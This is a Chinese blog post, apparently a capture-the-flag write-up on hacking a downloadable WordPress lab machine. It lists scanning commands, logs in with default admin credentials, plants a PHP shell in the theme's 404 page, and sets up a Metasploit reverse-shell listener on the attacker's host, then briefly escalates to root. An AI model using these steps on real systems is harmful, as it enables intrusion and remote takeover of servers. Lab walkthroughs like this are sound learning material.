前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
目录
robots.txt文件出现/wordpress/,对其进行访问
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网英语越来越广泛,企业信息化的过程中各种英语都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更严重的则是在网页中植入恶意代码,使得网站访问者收到侵害。
kali 192.168.20.128
靶机 192.168.20.142
链接:https://pan.baidu.com/s/1JOpCuCiS_ycd_ZRyehr4qw
提取码:6cpf
nmap -sV 192.168.20.142

nmap -A -v -T4 192.168.20.142

nikto -host http://192.168.20.142

dirb http://192.168.20.142


wpscan --url http://192.168.20.142/wordpress/ --enumerate at --enumerate ap --enumerate u

admin/admin


复制生成的shell上传到404页面上

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.20.128
set lport 4444
run

http://192.168.20.142/wordpress/wp-content/themes/twentyfourteen/404.php


sudo -l提权不行





chomod 777 shellroot
执行shellroot
